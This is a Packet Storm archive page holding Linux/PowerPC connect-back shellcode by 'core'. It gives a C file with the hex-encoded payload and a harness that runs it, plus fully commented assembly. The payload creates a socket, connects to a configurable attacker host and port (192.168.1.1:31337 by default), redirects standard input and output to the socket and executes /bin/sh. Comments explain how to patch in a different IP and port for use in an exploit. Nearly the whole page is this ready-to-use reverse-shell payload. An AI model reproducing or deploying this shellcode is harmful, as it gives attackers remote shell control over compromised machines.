Linux/ppc shellcode which connects /bin/sh to a host. connect-core5.s is appended.
ff836d3fdda9ddcc1157a20752d7f94cb9c0518549ed0ff11dc9dc5f996f11bf/* connect-core5.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* connect back & execve /bin/sh linux/ppc by core */
"\x7c\x3f\x0b\x78" /*mr r31,r1*/
"\x3b\x40\x01\x0e" /*li r26,270*/
"\x3b\x5a\xfe\xf4" /*addi r26,r26,-268*/
"\x7f\x43\xd3\x78" /*mr r3,r26*/
"\x3b\x60\x01\x0d" /*li r27,269*/
"\x3b\x7b\xfe\xf4" /*addi r27,r27,-268*/
"\x7f\x64\xdb\x78" /*mr r4,r27*/
"\x7c\xa5\x2a\x78" /*xor r5,r5,r5*/
"\x7c\x3c\x0b\x78" /*mr r28,r1*/
"\x3b\x9c\x01\x0c" /*addi r28,r28,268*/
"\x90\x7c\xff\x08" /*stw r3,-248(r28)*/
"\x90\x9c\xff\x0c" /*stw r4,-244(r28)*/
"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/
"\x7f\x63\xdb\x78" /*mr r3,r27*/
"\x3b\xdf\x01\x0c" /*addi r30,r31,268*/
"\x38\x9e\xff\x08" /*addi r4,r30,-248*/
"\x3b\x20\x01\x98" /*li r25,408*/
"\x7f\x20\x16\x70" /*srawi r0,r25,2*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"\x7c\x78\x1b\x78" /*mr r24,r3*/
"\xb3\x5e\xff\x16" /*sth r26,-234(r30)*/
"\x7f\xbd\xea\x78" /*xor r29,r29,r29*/
// Craft your exploit to poke these value in. Right now it's set
// for port 31337 and ip 192.168.1.1. Here's an example
// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1
// 0xc0a8
// 0x0101
"\x63\xbd" /* PORT # */ "\x7a\x69" /*ori r29,r29,31337*/
"\xb3\xbe\xff\x18" /*sth r29,-232(r30)*/
"\x3f\xa0" /*IP(A.B) */ "\xc0\xa8" /*lis r29,-16216*/
"\x63\xbd" /*IP(C.D) */ "\x01\x01" /*ori r29,r29,257*/
"\x93\xbe\xff\x1a" /*stw r29,-230(r30)*/
"\x93\x1c\xff\x08" /*stw r24,-248(r28)*/
"\x3a\xde\xff\x16" /*addi r22,r30,-234*/
"\x92\xdc\xff\x0c" /*stw r22,-244(r28)*/
"\x3b\xa0\x01\x1c" /*li r29,284*/
"\x38\xbd\xfe\xf4" /*addi r5,r29,-268*/
"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/
"\x7f\x20\x16\x70" /*srawi r0,r25,2*/
"\x7c\x7a\xda\x14" /*add r3,r26,r27*/
"\x38\x9c\xff\x08" /*addi r4,r28,-248*/
"\x44\xde\xad\xf2" /*.long0x44deadf2*/
"\x7f\x03\xc3\x78" /*mr r3,r24*/
"\x7c\x84\x22\x78" /*xor r4,r4,r4*/
"\x3a\xe0\x01\xf8" /*li r23,504*/
"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"\x7f\x03\xc3\x78" /*mr r3,r24*/
"\x7f\x64\xdb\x78" /*mr r4,r27*/
"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
// comment out the next 4 lines to save 16 bytes and lose stderr
//"\x7f\x03\xc3\x78" /*mr r3,r24*/
//"\x7f\x44\xd3\x78" /*mr r4,r26*/
//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/
//"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\x35" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ"; /* Z will become NULL */
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte connect back execve /bin/sh for linux/ppc by core\n",
strlen(hellcode));
shell();
return 0;
}
#;;; PowerPC Linux Connect Back Shellcode
#;;;
#;;; This example connects /bin/sh to 192.168.1.1:31337
#;;;
#;;; by Charles 'core' Stevenson <core@bokeoa.com>
#;;;
#;;; Greetz: lamagra, palante, ghandi, d0tslash, and LSD for their
#;;; significant research without which none of this would be possible.
#;;;
#;;; Fsck: drow for never sharing his shellcode. Security through
#;;; obscurity never lasts forever man what did you expect? :)
#;;;
#;;; Note: Since this code is self modifying it'll crash if you just
#;;; compile the .s and run it directly. ;-) Copy somewhere writable
#;;; or run within gdb
#;;;
#;;; Last Updated: Wed Feb 16 20:14:43 MST 2005
#;;; * Swapped out addi with ori for IPv4 address creation so now
#;;; all IPs should work AFAICT, swapped sc with .long 0x44deadf2
#;;; to save from having to fix the NULL bytes... and removed an
#;;; unnesccesary instruction that got overlooked and left in LOL
#;;;
#;;; Revisions: Thu Aug 21 00:42:28 MDT 2003
#;;; * Fixed opcode, removed uneeded instruction and commented out stderr
#;;; dup2()
#;;; Mon Aug 12 23:12:52 MDT 2002
#;;; * Replaced execve with my own - core
.globl main
main:
#;; Save the stack pointer!!!!!!!!!!!!!!!!!!!!!!!!
#;; This critical step cost me HOURS upon hours in gdb stepping
#;; through one instruction at a time! :/
mr %r31, %r1
#;; This section of the code creates a socket()
#;; file descriptor for use with connect()
#;; The next three sections setup the arguments for the
#;; socket() syscall by storing values in registers 3-5
#;; AF_INET = 2
li %r26, 268 + 2
subi %r26, %r26, 268
mr %r3, %r26
#;; SOCK_STREAM = 1
li %r27, 268 + 1
subi %r27, %r27, 268
mr %r4, %r27
#;; IPPROTO_IP = 0
xor %r5, %r5, %r5 #; IPPROTO_IP
#;; Push the values on the stack
mr %r28, %r1
addi %r28, %r28, 268
stw %r3, -248(%r28)
stw %r4, -244(%r28)
stw %r5, -240(%r28)
#;;; Setup the arguments for socketcall
#;;;
#;; r3 = 1 (socket?)
mr %r3, %r27
#;; r4 = arg pointer
addi %r30, %r31, 268
subi %r4, %r30, 268-20
#;; r0 = __NR_socketcall
li %r25, 102*4 #; save 102
srawi %r0, %r25, 2
.long 0x44deadf2 #;sc
#;; Save the socket file descriptor value
mr %r24, %r3
#;;; This part sets up the sockaddr_in structure for the connect()
#;;; call.
#;; AF_INET = 2
sth %r26, -234(%r30)
#;; PORT (No byte shift needed on BIG endian! :)
xor %r29, %r29, %r29
ori %r29, %r29, 31337 #; elite port X-D
sth %r29, -232(%r30)
#;;; Ok.. here's how you get your ip value into this baby:
#;;;
#;;; This example is for IP address 192.168.0.1:
#;;;
#;;; $ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 0 1
#;;; 0xc0a8
#;;; 0x0001
#;; The first value (first half of X.X.x.x)
lis %r29, 0xc0a8
#;; The second value (last half of x.x.X.X)
ori %r29, %r29, 0x0101
#;; Store the address of the ip
stw %r29, -230(%r30)
#;;; Connect /bin/sh to server at ip and port given
#;;; above. The first steps setup the arguments for the
#;;; syscall.
stw %r24, -248(%r28) #; push socket_fd
subi %r22, %r30, 268-34 #; push &sa
stw %r22, -244(%r28)
li %r29, 268 + 16 #; sizeof(struct sockaddr_in)
subi %r5, %r29, 268
stw %r5, -240(%r28) #; push sizeof(struct sockaddr_in)
srawi %r0, %r25, 2 #; __NR_socketcall(
add %r3, %r26, %r27 #; connect = 3,
subi %r4, %r28, 268 - 20 #; argument pointer);
.long 0x44deadf2 #;sc
#;;; Setup I/O - here we duplicate stdin, stdout, and stderr
#;;; to the socket file descriptor. Basically dup2()
mr %r3, %r24 #; socket_fd
xor %r4, %r4, %r4 #; stdin = 0
li %r23, 63 * 8 #; __NR_dup2 = 63
srawi %r0, %r23, 3
.long 0x44deadf2 #;sc
mr %r3, %r24 #; socket_fd
mr %r4, %r27 #; stdout = 1
srawi %r0, %r23, 3
.long 0x44deadf2 #;sc
#;;; comment out this section to save 16 bytes and lose stderr
#;;; mr %r3, %r24 #; socket_fd
#;;; mr %r4, %r26 #; stderr = 2
#;;; srawi %r0, %r23, 3
#;;; .long 0x44deadf2 #;sc
#;;; execve("/bin/sh",["/bin/sh",NULL],NULL);
#;; GPR5 = 0 and CR = 0
#;; NOTE: xor != xor. (dot means update CR)
#;; *** THANKS GHANDI!!! ***
xor. %r5, %r5, %r5
#;; branch if counter is zero and store the address in
#;; link register (counter is 0 since we just loaded it;)
bdzl main + 200
#;; move the address of main to GPR24
mflr %r24
#;; get offset to /bin/sh
addi %r24, %r24, 268 + 40
#;; add null to end of string
stb %r5, -261(%r24)
#;; store pointer to /bin/sh
subi %r3, %r24, 268
stw %r3, -8(%r1)
#;; r4 = argument pointer
subi %r4, %r1, 8
#;; push environment pointer
stw %r5, -4(%r1)
#;; syscall(__NR_execve)
li %r30, 11*32
srawi %r0, %r30, 5
.long 0x44deadf2 #;sc
#;; /xxx/xxZ do not remove the Z!
.ascii "/bin/shZ"
#;;; EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed